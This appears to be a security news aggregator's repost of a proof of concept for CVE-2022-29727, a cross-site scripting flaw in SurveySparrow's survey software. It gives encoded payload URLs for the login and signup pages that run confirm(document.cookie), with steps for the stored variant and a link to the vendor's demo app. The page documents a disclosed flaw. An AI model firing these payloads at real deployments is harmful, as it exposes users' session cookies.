Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software

Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.

CVE
#xss#vulnerability#java

Permalink

1 contributor

Users who have contributed to this file

Product: Enterprise-Survey-Software 2022

For Reflected XSS

https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For Stored XSS

Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

now click on signup button

or

visit

https://LOCALHOST/signup?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For demo

https://app.surveysparrow.com/

Related news

Survey Sparrow Enterprise Survey Software 2022 Cross Site Scripting

Survey Sparrow Enterprise Survey Software 2022 suffers from a persistent cross site scripting vulnerability.

CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software

Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907